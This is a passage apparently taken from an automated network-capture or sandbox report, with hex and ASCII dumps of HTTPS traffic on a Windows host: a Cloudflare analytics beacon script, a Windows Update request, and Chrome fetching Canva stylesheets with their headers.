                                                                                                                                                                                                                                                                    Data Ascii: !function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r+
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC1369INData Raw: 3b 69 66 28 61 5b 36 5d 3d 31 35 26 61 5b 36 5d 7c 36 34 2c 61 5b 38 5d 3d 36 33 26 61 5b 38 5d 7c 31 32 38 2c 74 29 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 31 36 3b 2b 2b 63 29 74 5b 6f 2b 63 5d 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 69 28 61 29 7d 7d 2c 31 36 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67
                                                                                                                                                                                                                                                                    Data Ascii: ;if(a[6]=15&a[6]|64,a[8]=63&a[8]|128,t)for(var c=0;c<16;++c)t[o+c]=a[c];return t||i(a)}},168:function(e,t,n){"use strict";var r=this&&this.__assign||function(){return r=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var i in t=arg
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC1369INData Raw: 72 63 68 50 61 72 61 6d 73 29 7b 76 61 72 20 79 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 67 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5e 5c 3f 5d 2b 5c 3f 3f 2f 2c 22 22 29 29 2c 68 3d 79 2e 67 65 74 28 22 74 6f 6b 65 6e 22 29 3b 68 26 26 28 70 2e 74 6f 6b 65 6e 3d 68 29 3b 76 61 72 20 54 3d 79 2e 67 65 74 28 22 73 70 61 22 29 3b 70 2e 73 70 61 3d 6e 75 6c 6c 3d 3d 3d 54 7c 7c 22 74 72 75 65 22 3d 3d 3d 54 7d 7d 70 26 26 22 6d 75 6c 74 69 22 21 3d 3d 70 2e 6c 6f 61 64 26 26 28 70 2e 6c 6f 61 64 3d 22 73 69 6e 67 6c 65 22 29 2c 77 69 6e 64 6f 77 2e 5f 5f 63 66 42 65 61 63 6f 6e 3d 70 7d 69 66 28 73 26 26 70 26 26 70 2e 74 6f 6b 65 6e 29 7b 76 61 72 20 77 2c 53 2c 62 3d 21 31 3b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74
                                                                                                                                                                                                                                                                    Data Ascii: rchParams){var y=new URLSearchParams(g.replace(/^[^\?]+\??/,"")),h=y.get("token");h&&(p.token=h);var T=y.get("spa");p.spa=null===T||"true"===T}}p&&"multi"!==p.load&&(p.load="single"),window.__cfBeacon=p}if(s&&p&&p.token){var w,S,b=!1;document.addEventList
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC1369INData Raw: 2e 74 69 6d 69 6e 67 73 56 32 3d 7b 7d 2c 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 3d 32 2c 64 2e 64 74 3d 6d 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 2c 64 65 6c 65 74 65 20 64 2e 74 69 6d 69 6e 67 73 2c 74 28 6d 5b 30 5d 2c 64 2e 74 69 6d 69 6e 67 73 56 32 29 29 7d 31 3d 3d 3d 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 26 26 74 28 63 2c 64 2e 74 69 6d 69 6e 67 73 29 2c 74 28 75 2c 64 2e 6d 65 6d 6f 72 79 29 7d 65 6c 73 65 20 4f 28 64 29 3b 72 65 74 75 72 6e 20 64 2e 66 69 72 73 74 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 70 61 69 6e 74 22 29 2c 64 2e 66 69 72 73 74 43 6f 6e 74 65 6e 74 66 75 6c 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 29 2c 70 26 26 28 70 2e 69 63
                                                                                                                                                                                                                                                                    Data Ascii: .timingsV2={},d.versions.timings=2,d.dt=m[0].deliveryType,delete d.timings,t(m[0],d.timingsV2))}1===d.versions.timings&&t(c,d.timings),t(u,d.memory)}else O(d);return d.firstPaint=k("first-paint"),d.firstContentfulPaint=k("first-contentful-paint"),p&&(p.ic
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC1369INData Raw: 65 72 65 64 3a 21 30 7d 7d 3b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 52 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 52 29 7d 29 29 3b 76 61 72 20 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 26 26 30 3d 3d 3d 76 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 69 64 3d 3d 3d 6c 7d 29 29 2e 6c 65 6e 67 74 68 7d 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 2e 70 75 73 68 28 7b 69 64 3a 6c 2c 75 72 6c 3a 65 2c 74 73 3a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65
                                                                                                                                                                                                                                                                    Data Ascii: ered:!0}};"complete"===window.document.readyState?R():window.addEventListener("load",(function(){window.setTimeout(R)}));var A=function(){return L&&0===v.filter((function(e){return e.id===l})).length},_=function(e){v.push({id:l,url:e,ts:(new Date).getTime
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC1369INData Raw: 72 63 65 4c 6f 61 64 54 69 6d 65 2c 45 2e 6c 63 70 2e 65 72 64 3d 63 2e 65 6c 65 6d 65 6e 74 52 65 6e 64 65 72 44 65 6c 61 79 2c 45 2e 6c 63 70 2e 69 74 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 63 2e 6c 63 70 52 65 73 6f 75 72 63 65 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 69 6e 69 74 69 61 74 6f 72 54 79 70 65 2c 45 2e 6c 63 70 2e 66 70 3d 6e 75 6c 6c 3d 3d 3d 28 61 3d 6e 75 6c 6c 3d 3d 3d 28 6f 3d 63 2e 6c 63 70 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 65 6c 65 6d 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 66 65 74 63 68 70 72 69 6f 72 69 74 79 22 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 49 4e 50 22
                                                                                                                                                                                                                                                                    Data Ascii: rceLoadTime,E.lcp.erd=c.elementRenderDelay,E.lcp.it=null===(i=c.lcpResourceEntry)||void 0===i?void 0:i.initiatorType,E.lcp.fp=null===(a=null===(o=c.lcpEntry)||void 0===o?void 0:o.element)||void 0===a?void 0:a.getAttribute("fetchpriority"));break;case"INP"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC1369INData Raw: 64 65 64 42 6f 64 79 53 69 7a 65 26 26 28 72 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 3d 6e 5b 30 5d 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 29 2c 65 2e 64 74 3d 6e 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 29 2c 74 28 72 2c 65 2e 74 69 6d 69 6e 67 73 56 32 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 76 61 72 20 74 3b 69 66 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 3d 3d 3d 65 26 26 45 2e 66 63 70 26 26 45 2e 66 63 70 2e 76 61 6c 75 65 29 72 65 74 75 72 6e 20 45 2e 66 63 70 2e 76 61 6c 75 65 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 73 2e 67 65 74 45 6e 74 72 69
                                                                                                                                                                                                                                                                    Data Ascii: dedBodySize&&(r.decodedBodySize=n[0].decodedBodySize),e.dt=n[0].deliveryType),t(r,e.timingsV2)}}function k(e){var t;if("first-contentful-paint"===e&&E.fcp&&E.fcp.value)return E.fcp.value;if("function"==typeof s.getEntriesByType){var n=null===(t=s.getEntri
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC1369INData Raw: 76 65 6e 74 54 79 70 65 3d 7b 7d 29 29 5b 72 2e 4c 6f 61 64 3d 31 5d 3d 22 4c 6f 61 64 22 2c 72 5b 72 2e 41 64 64 69 74 69 6f 6e 61 6c 3d 32 5d 3d 22 41 64 64 69 74 69 6f 6e 61 6c 22 2c 72 5b 72 2e 57 65 62 56 69 74 61 6c 73 56 32 3d 33 5d 3d 22 57 65 62 56 69 74 61 6c 73 56 32 22 2c 28 6e 3d 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 7c 7c 28 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 3d 7b 7d 29 29 2e 48 69 67 68 3d 22 68 69 67 68 22 2c 6e 2e 4c 6f 77 3d 22 6c 6f 77 22 2c 6e 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 2c 31 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77
                                                                                                                                                                                                                                                                    Data Ascii: ventType={}))[r.Load=1]="Load",r[r.Additional=2]="Additional",r[r.WebVitalsV2=3]="WebVitalsV2",(n=t.FetchPriority||(t.FetchPriority={})).High="high",n.Low="low",n.Auto="auto"},104:function(e,t){!function(e){"use strict";var t,n,r,i,o,a=function(){return w
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC1369INData Raw: 30 3f 72 3d 22 70 72 65 72 65 6e 64 65 72 22 3a 64 6f 63 75 6d 65 6e 74 2e 77 61 73 44 69 73 63 61 72 64 65 64 3f 72 3d 22 72 65 73 74 6f 72 65 22 3a 6e 2e 74 79 70 65 26 26 28 72 3d 6e 2e 74 79 70 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2d 22 29 29 29 2c 7b 6e 61 6d 65 3a 65 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 3d 3d 3d 74 3f 2d 31 3a 74 2c 72 61 74 69 6e 67 3a 22 67 6f 6f 64 22 2c 64 65 6c 74 61 3a 30 2c 65 6e 74 72 69 65 73 3a 5b 5d 2c 69 64 3a 22 76 33 2d 22 2e 63 6f 6e 63 61 74 28 44 61 74 65 2e 6e 6f 77 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 38 39 39 39 39 39 39 39 39 39 39 39 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2b 31 65 31 32 29 2c 6e 61 76 69 67 61 74 69 6f 6e 54 79 70 65 3a 72 7d 7d 2c
                                                                                                                                                                                                                                                                    Data Ascii: 0?r="prerender":document.wasDiscarded?r="restore":n.type&&(r=n.type.replace(/_/g,"-"))),{name:e,value:void 0===t?-1:t,rating:"good",delta:0,entries:[],id:"v3-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 72 65 72 65 6e 64 65 72 69 6e 67 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 3c 30 26 26 28 77 3d 53 28 29 2c 45 28 29 2c 6c 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 3d 53 28 29 2c 45 28 29 7d 29 2c 30 29 7d 29 29 29 2c 7b 67 65 74 20 66 69 72 73 74 48 69 64 64 65 6e 54 69 6d 65 28 29 7b 72 65 74 75 72 6e 20 77 7d 7d 7d 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 6f 63 75 6d 65 6e 74 2e 70
                                                                                                                                                                                                                                                                    Data Ascii: function(){removeEventListener("visibilitychange",b,!0),removeEventListener("prerenderingchange",b,!0)},C=function(){return w<0&&(w=S(),E(),l((function(){setTimeout((function(){w=S(),E()}),0)}))),{get firstHiddenTime(){return w}}},P=function(e){document.p


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    31192.168.2.12497394.175.87.197443
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pO2K6stB2bhAWuO&MD=kHd4COxR HTTP/1.1
                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                    MS-CorrelationId: 225d2259-4b82-4e68-97ba-915cb72649c2
                                                                                                                                                                                                                                                                    MS-RequestId: bac72282-8e59-4c5e-a9e7-547476065e01
                                                                                                                                                                                                                                                                    MS-CV: BHlQgd9Z1EGoZ06H.0
                                                                                                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:34 GMT
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Content-Length: 24490
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    32192.168.2.1249753104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC806OUTGET /web/d34caaf7c270c576.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1181INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:35 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 177
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950f3189442c8-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49975
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "0491c3e235b132cd7f471352c499af60"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:21 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:23 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: T7aYR5O+GlW1kDedUz7Aruh/CpDpZ9QNdiumSD++bepjcpU2loAesz600ZNebMCcv/Uew6iqhrQ=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8K0S6FMCFYM95D
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: UYCZlOtAvBNJot79imz2co8vJJwRzM03
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4f 68 56 73 36 4c 69 4e 52 59 53 62 63 5a 65 39 47 41 37 67 36 31 48 68 42 4f 55 62 50 63 6a 4b 76 65 25 32 42 56 4e 6c 46 71 4d 75 4c 78 45 78 54 50 56 4f 72 6f 32 69 42 4d 36 75 4b 25 32 42 4e 38 72 48 77 79 69 42 70 43 6d 25 32 46 6a 70 4f 4e 69 7a 39 74 68 44 59 69 33 64 33 25 32 46 62 66 6e 58 6c 72 76 61 59 55 54 4a 64 66 32 49 63 35 77 6a 77 49 6b 6b 32 34 46 4b 4b 4a 32 6b 48 58 4c 76 63 30 57 53 6a 74 73 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OhVs6LiNRYSbcZe9GA7g61HhBOUbPcjKve%2BVNlFqMuLxExTPVOro2iBM6uK%2BN8rHwyiBpCm%2FjpONiz9thDYi3d3%2FbfnXlrvaYUTJdf2Ic5wjwIkk24FKKJ2kHXLvc0WSjts%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC177INData Raw: 2e 6c 52 69 41 68 67 7b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 76 77 7d 2e 49 52 69 55 47 67 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 2e 46 4a 41 33 55 41 7b 64 69 73 70 6c 61 79 3a 63 6f 6e 74 65 6e 74 73 7d 0a 2f 2a 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 6f 75 72 63 65 6d 61 70 73 2f 64 33 34 63 61 61 66 37 63 32 37 30 63 35 37 36 2e 6c 74 72 2e 63 73 73 2e 6d 61 70 2a 2f
                                                                                                                                                                                                                                                                    Data Ascii: .lRiAhg{height:100vh;left:0;position:fixed;top:0;width:100vw}.IRiUGg{pointer-events:none}.FJA3UA{display:contents}/*# sourceMappingURL=sourcemaps/d34caaf7c270c576.ltr.css.map*/


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    33192.168.2.1249752104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC806OUTGET /web/40fff0481e1704cd.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1182INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:35 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 8427
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950f37fb17cab-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49975
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "abb678f59043822a9a8406a9e9f8841d"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:21 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:16 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
